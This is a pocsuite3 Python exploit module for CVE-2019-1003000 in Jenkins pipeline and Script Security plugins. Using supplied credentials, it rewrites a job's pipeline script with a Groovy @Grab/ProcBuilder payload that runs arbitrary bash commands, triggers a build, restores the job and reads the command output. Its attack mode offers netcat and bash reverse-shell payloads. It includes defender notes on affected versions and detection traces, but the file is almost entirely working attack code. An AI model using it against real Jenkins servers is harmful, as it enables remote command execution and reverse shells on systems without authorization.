Jenkins_Script-Security_Pipeline插件远程代码执行漏洞_CVE-2019-1003000.py
#!/usr/bin/env python3
# coding: utf-8
from pocsuite3.api import Output, POCBase, register_poc, requests, OptDict
import random, json
from collections import OrderedDict
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY
import jenkins
from xml.etree import ElementTree as ET
import time
# The lines above are template boilerplate: encoding declaration, base-class import and library imports.
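class TestPOC(POCBase):
    """pocsuite3 check for CVE-2019-1003000 in the Jenkins pipeline plugins.

    The check is authenticated: it needs an account that can read,
    reconfigure and build the named job, because it temporarily swaps the
    job's inline pipeline script, triggers one build, and puts the original
    configuration back.

    Defender notes:
      * Affected plugin versions are the ones listed in ``appVersion``;
        upgrading the three plugins past those versions is the fix.
      * Keep Job/Configure limited to trusted accounts. This check only
        works with credentials that may edit the job.
      * A run leaves a recognisable trail: a job configuration update, a
        build, and a second configuration update within a few seconds, with
        a ``@Grab`` annotation in the pipeline script of that build.
    """

    vulID = 'exp-55'
    author = 'WYS'
    appName = 'Jenkins'  # application name
    appVersion = 'Pipeline: Declarative Plugin up to and including 1.3.4\n' \
                 'Pipeline: Groovy Plugin up to and including 2.61\n' \
                 'Script Security Plugin up to and including 1.49'  # affected versions
    name = u'Jenkins 插件远程代码执行漏洞(CVE-2019-1003000)'  # same as the file name
    desc = u'Jenkins 插件远程代码执行漏洞'  # short description of the vulnerability
    samples = []  # sites where the PoC has been confirmed; intentionally empty

    # Pipeline script written into the job; "%s" receives the command string.
    _SCRIPT_TEMPLATE = '''
import org.buildobjects.process.ProcBuilder
@Grab('org.buildobjects:jproc:2.2.3')
class Dummy{ }
print new ProcBuilder("/bin/bash").withArgs("-c","%s").run().getOutputString()
'''

    def _options(self):
        """Declare the options the framework asks the operator for.

        Returns:
            OrderedDict mapping option name to its pocsuite3 option object.
        """
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        # NOTE(review): job/user/pass reuse the reverse-payload OptDict from
        # the template although they hold a job name and credentials; this
        # looks like a copy-paste and should be confirmed against the
        # framework's option types.
        o["job"] = OptDict(selected="bash", default=payload)
        o["user"] = OptDict(selected="bash", default=payload)
        o["pass"] = OptDict(selected="bash", default=payload)
        return o

    def _verify(self):
        """Run the check with the fixed marker command ``echo test``."""
        return self._run_job_script("echo test")

    def _attack(self):
        """Run the check with the operator-supplied ``command`` option."""
        return self._run_job_script(self.get_option("command"))

    def _run_job_script(self, cmd):
        """Swap the job's pipeline script, build once, restore, read the log.

        Both modes share this path; only ``cmd`` differs.

        Args:
            cmd: command string substituted into the pipeline script.

        Returns:
            The ``Output`` built by ``parse_output``; it is a failure when
            any step raised or the console log lacked the expected markers.
        """
        result = {}
        job_name = self.get_option("job")
        username = self.get_option("user")
        password = self.get_option("pass")
        server = jenkins.Jenkins(self.url, username, password)

        original_config = None
        restore_pending = False
        try:
            original_config = server.get_job_config(job_name)
            tree = ET.fromstring(original_config)
            tree.find('definition/script').text = self._SCRIPT_TEMPLATE % cmd
            modified_config = ET.tostring(tree, encoding='utf8', method='xml')

            # Set the flag before the call: a request that errors half-way
            # may still have changed the job on the server.
            restore_pending = True
            server.reconfig_job(job_name, modified_config)
            time.sleep(3)
            queue_number = server.build_job(job_name)
            time.sleep(3)

            # NOTE(review): this wait has no upper bound; a build that never
            # leaves the queue keeps the modified script in place until the
            # run is interrupted (the finally block below then restores it).
            queue_item_info = {}
            while 'executable' not in queue_item_info:
                queue_item_info = server.get_queue_item(queue_number)
                time.sleep(1)

            # Put the job back as early as possible, as the original did.
            server.reconfig_job(job_name, original_config)
            restore_pending = False
            time.sleep(3)

            last_build_number = server.get_job_info(job_name)['lastBuild']['number']
            console_output = server.get_build_console_output(job_name, last_build_number)
            after_echo = console_output.split('echo', 2)[1]
            command_output = after_echo.split('[Pipeline]', 2)[0]

            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['INFO'] = command_output
        except Exception:
            # Every failure lands here (bad credentials, unreachable host,
            # missing job, job without an inline script), so this verdict
            # means "not confirmed", not "patched". KeyboardInterrupt and
            # SystemExit are no longer swallowed.
            print('target is not vulnerable')
        finally:
            # Never leave the tested job carrying the injected script.
            if restore_pending:
                try:
                    server.reconfig_job(job_name, original_config)
                except Exception as exc:
                    print('WARNING: job %r was not restored to its original '
                          'configuration; restore it manually (%s)'
                          % (job_name, exc))
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in a pocsuite3 ``Output``.

        Args:
            result: dict filled on success, empty otherwise.

        Returns:
            ``Output`` marked successful when ``result`` is non-empty, else
            failed with the message 'target is not vulnerable'.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output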
# Register the PoC class with pocsuite3 when this module is imported.
register_poc(TestPOC)